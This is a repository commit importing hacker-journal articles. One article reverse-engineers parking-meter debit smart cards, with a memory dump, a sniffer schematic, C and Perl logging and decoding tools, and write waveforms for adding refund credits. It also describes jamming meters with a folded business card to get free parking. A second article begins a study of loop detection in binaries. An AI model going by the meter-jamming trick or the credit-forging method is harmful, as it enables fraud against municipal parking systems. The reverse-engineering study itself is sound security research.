1st import into tree

This commit is contained in:
Rui Reis 2016-12-15 17:41:58 +00:00
parent 1d06a57fbb
commit 6b097ec81b
73 changed files with 41019 additions and 0 deletions

uninformed/1.1.txt (diff suppressed, too large)

uninformed/1.2.txt (diff suppressed, too large)
uninformed/1.3.txt
==Uninformed Research==
|=-----------------------=[ Smart Parking Meters ]=---------------------=|
|=----------------------------------------------------------------------=|
|=------------------=[ h1kari <h1kari@dachb0den.com> ]=-----------------=|
--=[ Contents ]=----------------------------------------------------------
1 - Introduction
2 - ISO7816
3 - Synchronous Cards
3.1 - Memory Cards
3.2 - Parking Meter Debit Cards
3.3 - The Simple Hack
4 - Memory Dump
5 - Synchronous Smart Card Protocol Sniffing
5.1 - Sniffer Design
5.2 - Sniffer Code
6 - Protocol Analysis
6.1 - Decoding Data
6.2 - Timing Graph
6.3 - Conclusions
7 - Conclusion
--[ 1 - Introduction ]----------------------------------------------------
If this whitepaper looks a little familiar to you, I'm going to admit
off the bat that it's based a bit on Phrack 48-10/11 (Electronic Telephone
Cards: How to make your own!) and is using a similar format to Phrack
62-15 (Introduction for Playing Cards for Smart Profits). I highly
recommend you read both of them if you're trying to learn about smart
cards.
I'm sure that many of you that live near a major city have seen
parking meters that require you to pay money in order to park in a spot.
Upon initial analysis of these devices you'll notice there is a slot for
money to go in. On some, there is also a slot for a Parking Meter Debit
Card that you can purchase from the city. This article will analyze these
Parking Meters and their Debit Cards, show how they tick, and show how you
can defeat their security.
The end goal, however, is to provide enough information so you can
create your own tools to learn more about smart cards and how they work.
I have no intention of having people use this article to rip off the
government; this is for educational purposes only. My only hope is that by
getting this information out there, security systems will be designed more
thoroughly in the future.
PARKING METER
_,-----,_
,-' `-,
/ ._________. \
/ , | 00:00 <+-,-+------ Time/Credits Display
Meter Status ----+>'-''---------''-'<+----- Meter Status
| ,-------, |
| |\ |<+-------+----- Coin Slot
Smart Card Slot -----\--+->\ | | /
\ '----\--' /
\ /
\ /
\ /
\-----------/
| ,-------, |
Money --------+-+-->o | |
| | | |
| | | |
| '-------' |
\---------/
| |
For those not familiar with these devices, you can go to various
locations around town and purchase these Parking Meter Debit Cards
preloaded with $10, $20, or $50. To explain how to use them, I will
quote the instructions provided on the back of the cards:
.--------------------------------------------------------------------.
/ \
| PARKING METER DEBIT CARD |
| |
| 1. Insert debit card into meter in direction shown by arrow. |
| The dollar balance of the card will flash 4 times. |
| 2. The Meter will increment in 6 min. segments. |
| 3. When desired time is displayed, remove card. |
| |
| DID YOU BUY TOO MUCH TIME? |
| TO OBTAIN EXTRA TIME REFUND |
| |
| * Insert the same debit card that was used to purchase time |
| on the meter. Full 6 minute increments will be credited to |
| card. Increments of less than 6 minutes will be lost. |
| |
| Parking cards may be used for ************** meters |
| which have yellow posts. |
| |
\--------------------------------------------------------------------/
NOTE: The increments are now 4 min due to rising prices
I'm not including a lot of information that's provided in the Phrack
articles mentioned above, so if things look a little incomplete, please
read through them before emailing me with questions.
Here's a list of all of my resources:
- The ISO7816 Standard
- Phrack 48-10/11 & 62-15
- Towitoko ChipDrive 130
- Homebrew Synchronous Protocol Sniffer (Schematics Included)
- A few Parking Meter Debit Cards
- A few Parking Meters
- Computer with a Parallel Port
- A business card or two
--[ 2 - ISO7816 ]---------------------------------------------------------
The ISO 7816 standard is one of the few resources we have to work with
when reverse engineering a smart card. It provides us with basic knowledge
of pin layouts, what the different pins do, and how to interface with
them. Unfortunately, it mostly covers asynchronous cards and doesn't
really touch on how synchronous cards work. To get more detailed
information on this please read Phrack 48-10/11.
--[ 3 - Synchronous Cards ]-----------------------------------------------
Synchronous protocols are usually used with memory cards, mainly to
reduce cost (since the card doesn't require an internal clock) and because
memory cards usually don't require much logic and are used for simple
applications. Asynchronous cards, on the other hand, have an internal
clock and can communicate with the reader at a fixed rate across the I/O
line (usually 9600 baud). Asynchronous cards are usually used with
processor cards where more interaction is required (see Phrack 62-15).
----[ 3.1 - Memory Cards ]------------------------------------------------
Memory cards use a very simple protocol for sending data. First off,
because synchronous cards don't know anything about timing, their clock is
provided by the reader. In this situation, the reader can set the I/O line
when the clock is low (0v) and the card can set the I/O line when the
clock is high (5v). To dump all of the memory from a card, the reader
first sets the Reset line high to reset the card and keeps the clock
ticking. The first time the clock is raised after the Reset line goes low,
the card will set the I/O line to bit 0 of its memory; the second time
it's raised, the card will set the I/O line to bit 1; and so on. This is
repeated until all of the data is dumped from the card.
__________________
_| |___________________________________________ Reset
: :
: _____ : _____ _____ _____ _____
_:_______| |____:_| |_____| |_____| |_____| Clk
: : : : : : : : : :
_:_______:__________:_:_____:_____:_____:_____:_____:_____:_____
_:___n___|_____0____:_|_____1_____|_____2_____|_____3_____|___4_ (Address)
: : : : :
_: :_______:___________:___________:___________
_XXXXXXXXXXXXXXXXXXXX_______|___________|___________|___________ Data
Bit n Bit 0 Bit 1 Bit2 Bit3
(Borrowed from Stephane Bausson's paper re-published in Phrack 48-10)
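The clocking scheme above can be modeled in plain C. This is a minimal
software simulation for illustration only; the sync_card struct and the
card_clock_rise()/reader_dump() names are made up here, not part of any
real reader API:

```c
#include <assert.h>
#include <string.h>

/* Hypothetical software model of a synchronous memory card: the reader
 * supplies the clock, and each rising edge after reset shifts out the
 * next bit of card memory on the I/O line. */
typedef struct {
    const unsigned char *mem;   /* card memory image */
    int nbits;                  /* total bits available */
    int addr;                   /* internal address counter */
} sync_card;

static void card_reset(sync_card *c) { c->addr = 0; }

/* Card drives I/O while the clock is high: return the bit at the current
 * address and advance the counter, as happens on each rising edge. */
static int card_clock_rise(sync_card *c)
{
    int bit = (c->mem[c->addr / 8] >> (c->addr % 8)) & 1; /* LSB-first */
    if (c->addr < c->nbits - 1)
        c->addr++;
    return bit;
}

/* Reader side: pulse reset, then tick the clock nbits times, sampling
 * the I/O line on every rising edge. */
static void reader_dump(sync_card *c, unsigned char *out, int nbits)
{
    int i;
    memset(out, 0, (nbits + 7) / 8);
    card_reset(c);
    for (i = 0; i < nbits; i++)
        out[i / 8] |= card_clock_rise(c) << (i % 8);
}
```

Since the card has no clock of its own, the reader fully controls the
pace: dumping is just "reset, then clock out every bit in order."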
----[ 3.2 - Parking Meter Debit Cards ]-----------------------------------
Parking Meter Debit Cards behave very similarly to standard memory
cards, however they also have to provide some basic security to make sure
people can't get free parking. This is done by using a method similar to
the European Telephone Cards (SLE4406) where there is a section of memory
on the card that acts as a one-way counter where bits are set to a certain
amount of credits, then a security fuse is blown, and now the set bits can
only be flipped from 1 -> 0. This is a standard security mechanism that
makes it so people cannot recharge their cards once the credits have been
used. The only catch is that the way that the parking meters work makes it
so you can refund unused credits to the card.
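The one-way counter idea can be sketched in a few lines of C. This is a
rough illustration of the semantics only (the counter_card struct and
counter_write_bit() are made-up names, not from the SLE4406 datasheet or
any vendor spec): once the fuse is blown, a write that would flip a bit
from 0 back to 1 is refused.

```c
#include <assert.h>

/* Hypothetical model of a fused one-way counter card. */
typedef struct {
    unsigned char mem[32];
    int fuse_blown;
} counter_card;

/* Returns 0 on success, -1 if the write would recharge the card. */
static int counter_write_bit(counter_card *c, int bit_off, int value)
{
    unsigned char mask = 1 << (bit_off % 8);
    int cur = (c->mem[bit_off / 8] & mask) != 0;

    if (c->fuse_blown && value > cur)
        return -1;              /* setting a cleared bit is refused */
    if (value)
        c->mem[bit_off / 8] |= mask;
    else
        c->mem[bit_off / 8] &= ~mask;
    return 0;
}
```

Before the fuse is blown (at the factory) bits can be set to the card's
face value; afterwards, spending a credit clears a bit, and nothing the
user does through the interface can set it again.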
----[ 3.3 - The Simple Hack ]---------------------------------------------
If my little introduction to Synchronous Smart Cards just went right
over your head, here's an example of how to attack Parking Meters without
having to deal with electronics or code. If you ever try putting an
invalid card into a parking meter, you'll notice that after about 90
seconds of flashing error messages, it will switch over to Out-of-Order
status. Now, for convenience's sake, most cities allow you to park for
free in Out-of-Order spots. (Anyone see a loophole here???)
.----------------------------------------------------------------------.
| : |
| : |
| : |
| : |
| : |
| : |
| : |
| : |
| : <- insert folded side |
| : |
| : |
| : |
| : |
| : |
| : |
| : |
| : |
| : |
'----------------------------------------------------------------------'
One simple method you can use to make it less obvious that something
in the slot is causing the Out-of-Order status is to fold a business
card in half (preferably not yours) and insert it into the smart card
slot. It should be the perfect length to go in all the way and be very
difficult to notice and/or take out. When you're finished parking, you
should be able to pull the business card out using a credit card or small
flathead screwdriver.
--[ 4 - Memory Dump ]-----------------------------------------------------
To explain how the cards handle credits and refunds, I'll first show
you how the memory on the card is laid out. This dump was done with my
Towitoko ChipDrive 130 using Towitoko's SmartCard Editor software (very
useful). I highly suggest that you use a commercial smart card reader or
some other non-dumb reader for dealing with synchronous cards; dumb
mouse (and most home-brew) readers only work with asynchronous cards.
0x00: 9814 ff3c 9200 46b1 ffff ffff ffff ffff
0x10: ffff ffff ffff ff00 0000 0000 0000 0000
0x20: 0000 0000 0000 0000 0000 0000 0000 0000
0x30: 0000 0000 0000 0000 0000 0000 0000 0000
0x40: 0000 0000 0000 0000 0000 0000 0000 0000
0x50: 0000 0000 f8ff ffff ffff ffff fffc ffff
0x60: ffff ffff ffff ffff ffff ffff ffff ffff
0x70: ffff ffff ffff ffff ffff ffff ffff ffff
0x80: ffff ffff ffff ffff ffff ffff ffff ffff
0x90: ffff ffff ffff ffff ffff ffff ffff ffff
0xa0: fcff ffff ffff ffff ffff ffff ffff ffff
0xb0: ffff ffff ffff ffff ffff ffff ffff ffff
0xc0: ffff ffff
Now, if we convert the 0x50 line to bits and analyze it, we'll
notice this (note that bit-endianness is reversed):
0x50: 0000 0000 0000 0000 0000 0000 0000 0000
0x54: 0001 1111 1111 1111 1111 1111 1111 1111
0x58: 1111 1111 1111 1111 1111 1111 1111 1111
0x5c: 1111 1111 0011 1111 1111 1111 1111 1111
For every bit that is 1 between 0x17 and 0x55:1 (note: :x notation
specifies bit offset), you get $0.10 on your card. For every bit that is 0
between 0x5b and 0xb0, you get $0.10 in refunds. The total of these two
counters equals the amount of credits on your card. The way they handle
people spending the refunds is by having a buffer of bits in between 0x55:1
and 0x5b that can be used when there are refund bits to spend. This
only allows the user to use ~$5 worth of refund bits. On this particular
card, the user has $0.60 worth of credits and $0.20 worth of refunds,
making a total of $0.80 on the card (I know, I'm poor :-/).
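As a sketch, tallying the two counters is just a bit count over two
ranges. The exact boundaries (0x55:1 in particular) are specific to this
card, so they are parameters here; the function names and the synthetic
buffer in the test are made up for illustration, not taken from any real
card layout:

```c
#include <assert.h>

/* Count the 1 bits in bit range [start_bit, end_bit) of a dump,
 * addressing bits LSB-first within each byte. */
static int count_ones(const unsigned char *mem, int start_bit, int end_bit)
{
    int i, n = 0;
    for (i = start_bit; i < end_bit; i++)
        n += (mem[i / 8] >> (i % 8)) & 1;
    return n;
}

/* Card value in cents: credits still set (1 bits in the credit range)
 * plus refunds earned (0 bits in the refund range), $0.10 each. */
static int card_cents(const unsigned char *mem,
                      int cred_lo, int cred_hi,  /* credit bit range */
                      int ref_lo, int ref_hi)    /* refund bit range */
{
    int credits = count_ones(mem, cred_lo, cred_hi);
    int refunds = (ref_hi - ref_lo) - count_ones(mem, ref_lo, ref_hi);
    return (credits + refunds) * 10;
}
```

For example, a hypothetical two-byte card image { 0xf8, 0xfc } with the
credit range covering the first byte and the refund range the second has
five credit bits and two refund bits, i.e. $0.70.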
--[ 5 - Synchronous Smart Card Protocol Sniffing ]------------------------
Now that we've figured out how they store credits on the card, we need
to figure out how the reader writes to the card. To do this, we'll need
to somehow sniff the connection and reverse engineer their protocol. The
following section will show you how to make your own synchronous smart
card protocol sniffer and give you code for sniffing the connection.
----[ 5.1 - Sniffer Design ]----------------------------------------------
There's plenty of commercial hardware out there (Season) that allows
you to sniff asynchronous smart cards, but it's a totally different story
for synchronous cards. I wasn't able to find any hardware to do this
and, being totally dumb when it comes to electronics, found someone to
help me out with this design (thx XElf). It basically taps the lines
between a smart card and the reader and runs the signals through an
externally powered buffer to make sure our parallel port doesn't drain
the connection.
My personal implementation consists of a smart card socket I ripped
out of an old smart card reader and a Peet's coffee card that I made
ISO7816 pinouts on using copper tape, all connected by torn-apart floppy
drive cables and powered by a ripped-apart USB cable. You should be able
to find some pics on the net if you search around, although I guarantee
whatever you come up with will be less ghetto than mine.
Parallel Port
D10 - Ack - I6 o-------------------------,
|
D11 - Busy - I7 o-----------------------------,
| |
D12 - Paper Out - I5 o---------------------------------,
| | |
D13 - Select - I4 o-------------------------------------,
| | | |
D25 - Gnd o-----, | | | |
| | | | |
| | | | |
External 5V (USB) | | | | |
| | | | |
5V o------------------, | | | | |
| | | | | |
0V o-------*----*-----|---*-------------------|---|---|---|-----,
| | | | | | | | |
| | ,--==--==--==--==--==--==--==--==--==--==--, |
__+__ | |_ 20 19 18 17 16 15 14 13 12 11 | |
///// | | ] 74HCT541N | |
| |' 1 2 3 4 5 6 7 8 9 10 | |
| '--==--==--==--==--==--==--==--==--==--==--' |
| | | | | | | | | | | |
| | '---*---*---* | | | | '-----'
'-----*---------, ,---|---* | | |
| | ,-|---|---* | |
Smart Card | | | | | | *---|------,
,----------,----------, | | | | | | | *----, |
,-------|--* Vcc | Gnd *--|-* | | | ,-, ,-, ,-, ,-, | |
| |----------|----------| | | | | | | | | | | | | | |
| ,-----|--* Reset | Vpp | | | | | | | | | | | | | | |
| | |----------|----------| | | | | |_| |_| |_| |_| | |
| | ,---|--* Clock | I/O *--|---|-* | |r1 |r2 |r3 |r4 | |
| | | |----------|----------| | | | | |10k|10k|10k|10k | |
| | | ,-|--* RF1 | RF2 *--|---* | | | | | | | |
| | | | '----------'----------' | | | '---*---*---*---' | |
| | *-|-------------------------|-|-|----------------------' |
| *-|-|-------------------------|-|-|------------------------'
| | | | | | |
| | | | Smart Card Reader | | |
| | | | ,----------,----------, | | |
'-------|--* Vcc | Gnd *--|-' | |
| | | |----------|----------| | |
'-----|--* Reset | Vpp | | |
| | |----------|----------| | |
'---|--* Clock | I/O *--|---' |
| |----------|----------| |
'-|--* RF1 | RF2 *--|-----'
'----------'----------'
----[ 5.2 - Sniffer Code ]------------------------------------------------
To monitor the connection, compile and run this code with a log
filename as an argument. This code is written for OpenBSD and uses its
i386_iopl() function to get write access to the ports. You may need
to modify it to work on other OSes. Due to file I/O speed limitations, it
buffers samples in memory and only writes the log file when you hit
ctrl+c.
/*
 * Synchronous Smart Card Logger v1.0 [synclog.c]
 * by h1kari <h1kari@dachb0den.com>
 */
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/types.h>
#include <machine/sysarch.h>
#include <i386/pio.h>

#define BASE    0x378
#define DATA    (BASE)
#define STATUS  (BASE + 1)
#define CONTROL (BASE + 2)
#define ECR     (BASE + 0x402)

#define BUF_MAX (1024 * 1024 * 8) /* max log size 8mb */

int bufi = 0;
u_char buf[BUF_MAX];
char *logfile;

void printbits(FILE *fh, int b);

void
die(int signo)
{
        int i;
        FILE *fh;

        /* open logfile and write output */
        if((fh = fopen(logfile, "w")) == NULL) {
                perror("unable to open lpt log file");
                exit(1);
        }

        for(i = 0; i < bufi; i++)
                printbits(fh, buf[i]);

        /* flush and exit out */
        fflush(fh);
        fclose(fh);
        _exit(0);
}

void
printbits(FILE *fh, int b)
{
        /* log the four status lines we tap (high nibble of the port) */
        fprintf(fh, "%d%d%d%d\n",
            (b >> 7) & 1, (b >> 6) & 1,
            (b >> 5) & 1, (b >> 4) & 1);
}

int
main(int argc, char *argv[])
{
        u_char b, c;

        if(argc < 2) {
                fprintf(stderr, "usage: %s <file>\n", argv[0]);
                exit(1);
        }
        logfile = argv[1];

        /* enable port writing privileges */
        if(i386_iopl(3)) {
                printf("You need to be superuser to use this\n");
                exit(1);
        }

        /* clear status flags */
        outb(STATUS, inb(STATUS) & 0x0f);
        /* set epp mode, just in case */
        outb(ECR, (inb(ECR) & 0x1f) | 0x80);

        /* log to file when we get ctrl+c */
        signal(SIGINT, die);

        /* fetch dataz0r */
        c = 0;
        while(bufi < BUF_MAX) {
                /* select low nibble */
                outb(CONTROL, (inb(CONTROL) & 0xf0) | 0x04);
                /* read the status lines, saving each state change */
                if((b = inb(STATUS)) == c)
                        continue;
                buf[bufi++] = c = b; /* save last state bits */
        }

        printf("buffer overflow!\n");
        die(0);
        return 0;
}
It might also help to raise the process priority when running it, if
it looks like you're having timing issues:
# nice -n -20 ./synclog file.log
--[ 6 - Protocol Analysis ]-----------------------------------------------
Once we get our log of the connection, we'll need to run it through
some tools to analyze and decode the protocol. I've put together a couple
of simple tools that'll make your life a lot easier. One will simply
decode the bytes that are transferred across based on the state changes.
The other will graph out the whole conversation 2-dimensionally so you
can graphically view patterns in the connection.
----[ 6.1 - Decoding Data ]-----------------------------------------------
For decoding the data, we simply record bits to an input buffer when
the clock is in one state, and to an output buffer when the clock is in
the other. Then dump all of the bytes and reset our counter whenever
there's a reset. This should give us a dump of the data that's being
transferred between the two devices.
/*
 * Synchronous Smart Card Log Analyzer v1.0 [analyze.c]
 * by h1kari <h1kari@dachb0den.com>
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

#ifdef PRINTBITS
#define BYTESPERROW 8
#else
#define BYTESPERROW 16
#endif

void
pushbit(u_char *byte, u_char bit, u_char n)
{
        /* add specified bit to their byte */
        *byte &= ~(1 << (7 - n));
        *byte |= (bit << (7 - n));
}

void
printbuf(u_char *buf, int len, char *io)
{
        int i;

        printf("%s:\n", io);
        for(i = 0; i < len; i++) {
#ifdef PRINTBITS
                int j;
                for(j = 7; j >= 0; j--)
                        printf("%d", (buf[i] >> j) & 1);
                putchar(' ');
#else
                printf("%02x ", buf[i]);
#endif
                if((i % BYTESPERROW) == BYTESPERROW - 1)
                        printf("\n");
        }
        if((i % BYTESPERROW) != 0)
                printf("\n");
}

int
main(int argc, char *argv[])
{
        u_char ibit, obit;
        u_char ibyte, obyte;
        u_char clk, rst, bit;
        u_char lclk;
        u_char ibuf[1024 * 1024], obuf[1024 * 1024];
        int ii = 0, oi = 0;
        char line[1024];
        FILE *fh;

        if(argc < 2) {
                fprintf(stderr, "usage: %s <file>\n", argv[0]);
                exit(1);
        }
        if((fh = fopen(argv[1], "r")) == NULL) {
                perror("unable to open lpt log");
                exit(1);
        }

        ibit = obit = 0;
        ibyte = obyte = 0;
        lclk = 2;
        while(fgets(line, 1024, fh) != NULL) {
                bit = line[0] - '0';
                rst = line[2] - '0';
                clk = line[3] - '0';
                bit = bit ? 0 : 1; /* I/O line is inverted */
                if(lclk == 2) lclk = clk;

                /* print out buffers when we get a reset */
                if(rst) {
                        if(ii > 0 && oi > 0) {
                                printbuf(ibuf, ii, "input");
                                printbuf(obuf, oi, "output");
                        }
                        ibit = obit = 0;
                        ibyte = obyte = 0;
                        ii = oi = 0;
                }

                /* if clock high, input */
                if(clk) {
                        /* incr on clock change */
                        if(lclk != clk) obit++;
                        pushbit(&ibyte, bit, ibit);
                /* otherwise output */
                } else {
                        /* incr on clock change */
                        if(lclk != clk) ibit++;
                        pushbit(&obyte, bit, obit);
                }

                /* next byte */
                if(ibit == 8) {
                        ibuf[ii++] = ibyte;
                        ibit = 0;
                }
                if(obit == 8) {
                        obuf[oi++] = obyte;
                        obit = 0;
                }

                /* save last clock */
                lclk = clk;
        }

        fclose(fh);
        return 0;
}
----[ 6.2 - Timing Graph ]------------------------------------------------
Sometimes it really helps to see data graphically instead of just a
bunch of hex and 1's and 0's, so my friend pr0le threw together this Perl
script, which creates an image with a timing diagram of the lines.
Analyzing this made it easier to see how reads and writes to the card
were being performed.
#!/usr/bin/perl
use GD;

my $logfile = shift || die "usage: $0 <logfile>\n";

open( F, "<$logfile" ) or die "unable to open $logfile: $!\n";
my @lines = <F>;
close( F );

my $len = 3;
my $im_len = scalar( @lines );
my $w = $im_len * $len;
my $h = 100;

my $im = new GD::Image( $w, $h );
my $white = $im->colorAllocate( 255, 255, 255 );
my $black = $im->colorAllocate( 0, 0, 0 );
$im->fill( 0, 0, $white );

my $i = 1;
my $init = 0;
my ($bit1,$bit2,$rst,$clk);
my ($lbit1,$lbit2,$lrst,$lclk) = (undef,undef,undef,undef);

foreach my $line ( @lines ) {
    ($bit1,$bit2,$rst,$clk) = ($line =~ m/^(\d)(\d)(\d)(\d)/);
    if( $init ) {
        # one horizontal track per tapped line
        &print_bit( $lbit1, $bit1, 10 );
        &print_bit( $lbit2, $bit2, 30 );
        &print_bit( $lrst,  $rst,  50 );
        &print_bit( $lclk,  $clk,  70 );
    }
    ($lbit1,$lbit2,$lrst,$lclk) = ($bit1,$bit2,$rst,$clk);
    $init = 1;
    $i++;
}

open( F, ">$logfile.jpg" ) or die "unable to write $logfile.jpg: $!\n";
binmode F;
print F $im->jpeg;
close( F );
exit;

sub print_bit {
    my ($old, $new, $ybase) = @_;

    if( $new != $old ) {
        # level change: draw the vertical edge plus the new level
        if( $new ) {
            $im->line( $i*$len, $ybase+10, $i*$len, $ybase+20, $black );
            $im->line( $i*$len, $ybase+20, $i*$len+$len, $ybase+20, $black );
        } else {
            $im->line( $i*$len, $ybase+20, $i*$len, $ybase+10, $black );
            $im->line( $i*$len, $ybase+10, $i*$len+$len, $ybase+10, $black );
        }
    } else {
        # steady state: extend the current level
        if( $new ) {
            $im->line( $i*$len, $ybase+20, $i*$len+$len, $ybase+20, $black );
        } else {
            $im->line( $i*$len, $ybase+10, $i*$len+$len, $ybase+10, $black );
        }
    }
    return;
}
----[ 6.3 - Conclusions ]-------------------------------------------------
This code showed how the reserved lines on the smart card are used in
conjunction with credit increments and decrements. Here is an analysis of
how the reader triggers a credit deduction or addition on the card:
DEDUCT $0.10:
___________ ___________
_________| |___________| |__________________ Reset
____________________________________
_____________________| |_____ Clk
___________
_________| |__________________________________________ I/O
___________
_________| |__________________________________________ Rsv1
Then issue write command:
00011001 00101000 11111111 00111100
01001001 00000000 01100010 10001101
11111111 11111111 01110111 10101101
ADD $0.20:
___________ ___________ _____
_________| |___________| |____________| Reset
____________________________________
_____________________| |_____ Clk
_____________________________________________
|__________________ I/O
___________________________________
_________| |__________________ Rsv1
Then issue write command:
00011001 00101000 11111111 00111100
01001001 00000000 01100010 10001101
11111111 11111111 01110111 10101101
_____
__________________________________________________________| Reset
________ ___________ ____________
| |___________| |___________| |_____ Clk
____________________ ________________________
| |___________| |_____ I/O
____________________ ________________________
| 1 Credit |___________| 2 Credits |_____ Rsv1
Since the parking meter will refund whatever remaining amount there is
to the card and doesn't have to do it one at a time like with decrements,
the write command supports writing multiple credits back onto the card.
Simply repeat the waveform above and assert Reset when you're finished
"refunding" however many credits you want.
--[ 7 - Conclusion ]------------------------------------------------------
By now, you're probably thinking that this article sucks because there
isn't any ./code that will just give you more $. Unfortunately, most
smart card security protocols are fairly proprietary, and whatever code I
released probably wouldn't work in your particular city. Besides, all of
the data and waveforms I've included in this article probably give the
city they do correspond to enough info to start camping white vans on my
front lawn. ;-o
Instead of lame vendor-specific code, we're aiming to give you
something much more powerful in the next part of this article, which will
allow you to emulate arbitrary smart cards and simple electronic
protocols (thx spidey). So stay tuned for the next uninformed article
from Dachb0den Labs.
-h1kari 0ut

uninformed/1.4.txt
Loop Detection
Peter Silberman
peter.silberman@gmail.com
1) Foreword
Abstract: During the course of this paper the reader will gain new knowledge
about previous and new research on the subject of loop detection. The topic of
loop detection will be applied to the field of binary analysis, and a case
study will be given to illustrate its uses. All of the implementations provided
document have been written in C/C++ using Interactive Disassembler (IDA)
plug-ins.
Thanks: The author would like to thank Pedram Amini, thief, Halvar Flake,
skape, trew, Johnny Cache, and everyone else at nologin who helped with ideas
and kept those creative juices flowing.
2) Introduction
The goal of this paper is to educate the reader both about why loop detection
is important and how it can be used. When a security researcher thinks of
insecure coding practices, things like calls to strcpy and sprintf are some of
the first things to come to mind. These function calls are considered low
hanging fruit. Some security researchers think of integer overflows or
off-by-one copy errors as types of vulnerabilities. However, not many people
consider, or think to consider, the misuse of loops as a security problem.
With that said, loops have been around since the beginning of time (e.g. first
coding languages). The need for a language to iterate over data to analyze
each object or character has always been there. Still, not everyone thinks to
look at a loop for security problems. What if a loop doesn't terminate
correctly? Depending on the operation the loop is performing, it's possible
that it could corrupt surrounding memory regions if not properly managed. If
the loop frees memory that has already been freed or was never allocated, a
double-free bug may have been found. These are all things that could, and do,
happen in a
loop.
As the low hanging fruit is eliminated in software by security researchers and
companies doing decent to moderate QA testing, the security researchers have to
look elsewhere to find vulnerabilities in software. One area that has only
been touched on briefly in the public realm is how loops operate when
translated to binaries. BugScan (http://www.logiclibrary.com) is an example of
a company that has implemented "buffer iteration" detection but hasn't talked
publicly about it. The reader may ask: why would one want to look at
loops? Well, a lot of companies implement their own custom string routines,
like strcpy and strcat, which tend to be just as dangerous as the standard
string routines. These functions tend to go un-analyzed because there is no
quick way to say that they are copying a buffer. Due to this reason, loop
detection can help the security researcher identify areas of interest. During
the course of this article the reader will learn of the different ways to
detect loops using graph analysis, how to implement loop detection, see a new
loop detection IDA plug-in, and a case study that will tie it all together.
3) Algorithms Used to Detect Loops
A lot of research has been done on the subject of loop detection. The
research, however, was not done for the purpose of finding and exploiting
vulnerabilities that exist inside of loops. Most research has been done with
an interest in recognizing and optimizing loops. A good article about loop
optimization and compiler optimization is
http://www.cs.princeton.edu/courses/archive/spring03/cs320/notes/loops.pdf.
Research on the optimization of loops has led scientists to classify various
types of loops. There are two distinct categories to which any loop will
belong. Either the loop will be an irreducible loop Irreducible loops are
defined as "loops with multiple entry [points]"
(http://portal.acm.org/citation.cfm?id=236114.236115) or a reducible loop
Reducible loops are defined as "loops with one entry [point]"
(http://portal.acm.org/citation.cfm?id=236114.236115). Given that there are
two different distinct categories, it stands to reason that the two types of
loops are detected in different fashions. Two popular papers on loop detection
are Interval Finding Algorithm and Identifying Loops Using DJ Graphs. This
document will cover the most widely accepted theory on loop detection.
3.1) Natural Loop Detection
One of the most well known algorithms for loop detection is demonstrated in the
book Compilers Principles, Techniques, and Tools by Alfred V. Aho, Ravi Sethi
and Jeffrey D. Ullman. In this algorithm, the authors use a technique that
consists of two components to find natural loops. A natural loop "has a single
entry point. The header dominates all nodes in the loop."
(http://www-2.cs.cmu.edu/afs/cs.cmu.edu/academic/class/15745-s03/public/lectures/L7_handouts.pdf)
Note that not all loops are natural loops.
The first component of natural loop detection is to build a dominator tree out
of the control flow graph (CFG). A dominator can be found when all paths to a
given node have to go through another node. A control flow graph is essentially
a map of code execution with directional information. The algorithm in the
book calls for the finding of all the dominators in a CFG. Let's look at the
actual algorithm.
Starting from the entry node, the algorithm needs to check if there is a path
to the slave from the entry node. This path has to avoid the master node. If
it is possible to get to the slave node without touching the master node, it
can be determined that the master node does not dominate the slave node. If it
is not possible to get to the slave node, it is determined that the master node
does dominate the slave. To implement this routine the user would call the
is_path_to(ea_t from, ea_t to, ea_t avoid) function included in loopdetection.cpp.
This function will essentially check to see if there is a path from the
parameter from that can get to the parameter to, and will avoid the node
specified in avoid. Figure 1 illustrates this algorithm.
As the reader can see from Figure 1, there is a loop in this CFG. Let B to C
to D be the path of nodes that creates a loop; it will be represented as
B->C->D. There is also another loop from nodes B->D. Using the algorithm
described above it is possible to verify which of these nodes is involved in
the natural loop. The first question to ask is if the flow of the program can
get from A to D while avoiding B. As the reader can see, it is impossible in
this case to get to D avoiding B. As such, a call to the is_path_to function
will tell the user that B Dominates D. This can be represented as B Dom D, and
B Dom C. This is due to the fact that there is no way to reach C or D without
going through B. One question that might be asked is how exactly does this
demonstrate a loop? The answer is that, in fact, it doesn't. The second
component of the natural loop detection checks to see if there is a link, or
backedge, from D to B that would allow the flow of the program to return to
node B to complete the loop. In the case of B->D there exists a backedge that
does complete the loop.
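The two components above can be sketched as standalone C, using a small
adjacency matrix in place of IDA's ea_t addresses (the dfs, dominates, and
is_natural_loop helpers here are my own illustration, not the plug-in's
actual code). On the figure 1 CFG (A->B, B->C, C->D, B->D, plus the
backedge D->B), it confirms that B dominates D and that the backedge
completes a natural loop:

```c
#include <assert.h>
#include <string.h>

#define N 4  /* A=0, B=1, C=2, D=3 */

/* Walk the CFG from 'from' toward 'to', never entering 'avoid'. */
static int dfs(int adj[N][N], int from, int to, int avoid, int *seen)
{
    int i;
    if (from == to)
        return 1;
    seen[from] = 1;
    for (i = 0; i < N; i++)
        if (adj[from][i] && i != avoid && !seen[i] &&
            dfs(adj, i, to, avoid, seen))
            return 1;
    return 0;
}

/* Is there a path from 'from' to 'to' that avoids node 'avoid'? */
static int is_path_to(int adj[N][N], int from, int to, int avoid)
{
    int seen[N] = {0};
    if (from == avoid)
        return 0;
    return dfs(adj, from, to, avoid, seen);
}

/* master Dom slave iff entry cannot reach slave while avoiding master */
static int dominates(int adj[N][N], int entry, int master, int slave)
{
    return !is_path_to(adj, entry, slave, master);
}

/* natural loop with header h iff a backedge t->h exists and h Dom t */
static int is_natural_loop(int adj[N][N], int entry, int h, int t)
{
    return adj[t][h] && dominates(adj, entry, h, t);
}
```

Note that C does not dominate D here (the B->D edge bypasses it), which
is exactly why only B qualifies as the loop header.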
3.2) Problems with Natural Loop Detection
There is a very big problem with natural loops. The problem is with the
natural loop definition, which is ``a single entry point whose header dominates
all the nodes in the loop''. Natural loop detection does not deal with
irreducible loops, as defined previously. This problem can be demonstrated in
figure 2.
As the reader can see, both B and D are entry points into C. Also, neither D
nor B dominates C. This throws a huge wrench into the algorithm and makes it
only able to pick up loops that fall under the specification of a natural loop
or reducible loop. It is important to note that it is next to impossible to
produce an irreducible loop from structured high-level code.
4) A Different Approach to Loop Detection
The reader has seen how to detect dominators within a CFG and how to use that
as a component to find natural loops. The previous chapter described why
natural loop detection was flawed when trying to detect irreducible loops. For
binary auditing, the tool will need to be able to pick up all loops and then
let the user deduce whether or not the loops are interesting. This chapter
will introduce the loop algorithm used in the IDA plug-in to detect loops.
